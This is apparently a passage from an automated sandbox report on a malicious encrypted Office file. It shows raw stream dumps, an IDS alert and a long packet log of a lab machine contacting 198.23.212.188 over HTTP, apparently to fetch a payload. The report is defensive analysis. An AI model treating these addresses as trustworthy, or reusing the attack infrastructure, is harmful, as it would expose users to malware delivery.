Data ASCII:	Q . . . . . . . . " B . . $ c . . . ) . = . . . . \| . . C . . b J . q + d x . . . . . . . . k o . G 2 . } . . . . . . . . . . 3 a . . P s . . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . ` y \| S p s . a . j . . { S . . `
Data Raw:	51 f8 02 00 00 00 00 00 97 22 42 bb 09 24 63 18 db 8d 29 07 3d 15 d9 f5 20 92 7c 19 12 43 13 d9 62 4a e9 71 2b 64 78 10 a6 b5 1c a7 dd 0c 0e 6b 6f 10 47 32 a1 7d f8 9c ce 91 a9 1f 1c b2 8f e7 33 61 d1 9a 50 73 fc ca 6a 15 1b 7b 53 ed 0f 60 79 7c 53 70 73 b2 61 b9 6a 15 1b 7b 53 ed 0f 60 79 7c 53 70 73 b2 61 b9 6a 15 1b 7b 53 ed 0f 60 79 7c 53 70 73 b2 61 b9 6a 15 1b 7b 53 ed 0f 60

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.58293386159
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . T . . . . ] . . " . ~ . g . . . J . . . W S + . . n 2 . : . . . . . ? . . . ? . @ d . _ . 4 . a . . . 1 B \| . . . = . . . E . . ^ .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/26/20-21:23:30.852283	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49166	34.102.136.180	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2020 21:22:22.985236883 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.103699923 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.103852034 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.104727983 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.224294901 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.224359989 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.224399090 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.224436998 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.224500895 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.224546909 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.224554062 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.342739105 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.342808008 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.342848063 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.342885971 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.342926025 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.342940092 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.342964888 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.342977047 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.342982054 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.343009949 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.343014956 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.343059063 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.343065023 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.343107939 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461218119 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461278915 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461328030 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461370945 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461440086 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461445093 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461477041 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461481094 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461483002 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461488008 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461524010 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461534977 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461564064 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461585999 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461601973 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461602926 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461642027 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461663008 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461680889 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461688042 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461730957 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461736917 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461779118 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461788893 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461818933 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461836100 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461860895 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461867094 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461900949 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.461920023 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.461944103 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.464202881 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580070972 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580140114 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580178976 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580228090 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580239058 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580272913 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580276012 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580279112 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580284119 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580317020 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580341101 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580368042 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580388069 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580391884 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580431938 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580440998 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580459118 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580486059 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580508947 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580526114 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580540895 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580565929 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580594063 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580605030 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580615997 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580646038 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580672979 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580684900 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580703020 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580725908 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580744982 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580780029 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580782890 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580807924 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580847979 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580851078 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580888033 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580894947 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580902100 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580929041 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580945015 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.580979109 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.580985069 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581022978 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581037998 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581062078 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581079006 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581103086 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581118107 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581144094 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581156969 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581175089 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581204891 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581235886 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581274033 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581290007 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581314087 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581331015 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581355095 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.581370115 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.581413984 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.583611012 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.700459003 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700537920 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700582981 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700619936 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700659990 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700697899 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700735092 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700742960 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.700777054 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700792074 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.700818062 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700834036 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.700869083 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700886965 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.700911045 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700917959 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.700949907 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700968981 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.700990915 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.700998068 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701030970 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701050997 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701069117 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701100111 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701107979 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701121092 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701148033 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701153040 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701196909 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701204062 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701240063 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701256990 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701277971 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701301098 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701317072 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701324940 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701356888 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701379061 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701428890 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701436996 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701477051 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.701494932 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.701522112 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702440977 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702491999 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702528000 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702534914 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702558041 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702575922 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702589989 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702615976 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702637911 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702656984 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702671051 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702697039 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702721119 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702735901 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702745914 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702775955 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702795029 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702826023 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702841997 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702871084 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702886105 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702909946 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702929020 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702950001 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.702954054 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.702989101 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703006983 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703027964 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703037977 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703068018 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703087091 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703108072 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703124046 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703156948 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703166008 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703201056 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703218937 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703239918 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703248024 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703279972 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703298092 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703320026 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703344107 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703357935 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703378916 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703397036 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.703404903 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.703463078 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.705033064 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.819561005 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819623947 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819672108 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819710970 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819757938 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819802999 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819843054 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819844961 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.819884062 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.819888115 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.819930077 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.819952011 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823045969 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823101044 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823143005 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823182106 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823220015 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823260069 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823293924 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823297977 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823324919 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823331118 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823334932 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823348999 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823364973 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823393106 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823414087 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823432922 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823434114 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823476076 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823508978 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823514938 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823537111 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823554993 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823559999 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823594093 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823623896 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823633909 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823658943 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823674917 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823683023 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823725939 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823756933 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823764086 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823781013 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823806047 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823820114 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823847055 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823878050 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823884964 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823920012 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823929071 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823941946 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.823968887 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.823990107 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824017048 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824033022 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824059963 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824076891 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824099064 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824121952 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824140072 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824145079 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824179888 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824201107 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824218988 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824227095 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824259043 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824285030 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824300051 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824316978 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824350119 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824366093 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824393988 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824419975 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824434996 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824451923 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824479103 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824498892 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824522972 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824532032 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824575901 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824601889 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824615002 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824624062 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824654102 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824681997 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824701071 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.824706078 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824771881 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.824873924 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.939397097 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.939455986 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.939488888 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.939517975 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.939564943 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.939608097 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.939646959 CET	80	49165	198.23.212.188	192.168.2.22
